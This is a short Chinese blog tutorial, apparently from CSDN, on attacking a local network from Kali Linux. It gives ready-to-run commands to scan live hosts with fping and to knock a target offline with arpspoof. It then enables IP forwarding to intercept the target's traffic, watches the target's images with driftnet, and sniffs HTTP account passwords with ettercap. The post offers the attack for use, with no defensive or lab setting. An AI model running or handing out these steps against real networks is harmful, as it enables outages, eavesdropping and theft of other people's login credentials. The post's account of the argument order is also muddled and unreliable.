kali 的 arp内网 攻击

1  arp断网攻击

首先查看自己的ip地址 :ifconfig 命令

查到自己的ip地址为 192.168.0.23   子网掩码 为 255.255.255.0 是24位

查看局域网内所存活的ip :   fping -asg 192.168.0.0/24        (192.168.0.0/24 这个地址要根据自己所在的局域网地址更改)

 

断网攻击   :arpspoof -i eth0 -t 192.168.0.100(目标ip) 192.168.0.1(网关)

2  arp欺骗攻击

开启流量转发功能就不会断网了echo 1 >/proc/sys/net/ipv4/ip_forward

 

进行欺骗:  arpspoof -i eth0 -t 192.168.0.1(目标ip) 192.168.0.100(网关)      这里注意,和断网攻击不同的是,目标ip的位置和网关的位置交换 了,很多新手可能会范这个错误,导致目标主机连不上网。

这样我们就截获了目标主机的流量,

看目标主机浏览的图片:     driftnet -i eth0

3  获取http账号密码 

在开启欺骗的同事,开启新端口,    开启嗅探ettercap -Tq -i eth0   

出现Starting Unified sniffing...   则表示成功            

 

  • 3
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值